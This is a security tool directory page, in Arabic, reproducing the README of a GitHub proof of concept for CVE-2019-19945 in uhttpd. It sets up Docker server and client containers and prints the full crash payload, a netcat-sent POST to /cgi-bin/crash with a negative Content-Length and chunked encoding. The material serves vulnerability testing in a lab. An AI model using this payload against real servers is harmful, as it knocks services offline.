Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19945_Test | Kitploit
أدوات/GitHubGitHub/delicatebyte/cve-2019-19945_test
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubdelicatebyte/cve-2019-19945_test

CVE-2019-19945_Test

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-19945_Test

هذا هو الكود الخاص بأول CVE مقترح

  1. تثبيت Docker

  2. بناء وتشغيل الخادم cd Server docker build -t server/cve . docker run -d --name server -p 80:80 server/cve

  3. الحصول على عنوان IP لحاوية الخادم Linux sudo docker container inspect server | grep -i IPAddress Windows Powershell docker container inspect server | Select-String "IPAddress" استخرج عنوان IP وأضفه إلى الأمر الخاص ببناء العميل يمكنك التحقق من الخادم بالذهاب إلى localhost:80 في متصفحك

  4. بناء وتشغيل العميل من خلال إلغاء تعليق سطر CMD في ملف Client/Dockerfile سيبدأ الهجوم تلقائيًا مع بدء تشغيل الحاوية cd ../Client/ docker build --build-arg server_ip=<SERVER_IP> -t client/cve . docker run -d -p 8080:8080 client/cve

  5. الاتصال بحاوية Docker الخاصة بالعميل docker container ls ابحث عن حاوية client/cve واتصل بها docker exec -it /bin/sh

  6. عند الجاهزية أطلق الهجوم ./crash.sh

  7. لن يتمكن الخادم من الاستجابة

الكود المصدري المشروح

لا جدوى حقيقية من توفير كود مصدري مشروح لأن الاستغلال قصير جدًا

يتكون الاستغلال من استخدام Netcat وإرسال طلب POST بقيمة Content-Length سالبة كبيرة إلى الخادم بشأن معالجة الملفات في دليل cgi-bin/

يتم التنفيذ باستخدام سكربت netcat بسيط. هنا تتم الإشارة إلى ملف في مجلد CGI-bin الخاص بالخادم يُدعى Crash nc <SERVER_IP> < crash.poc

crash.poc

POST /cgi-bin/crash HTTP/1.0 Transfer-Encoding: chunked Content-Length: -100000

كانت أكبر مشكلة هي محاولة تشغيل الإصدارات القديمة من uhttpd في بيئة docker محدّثة.

تنزيل الأداة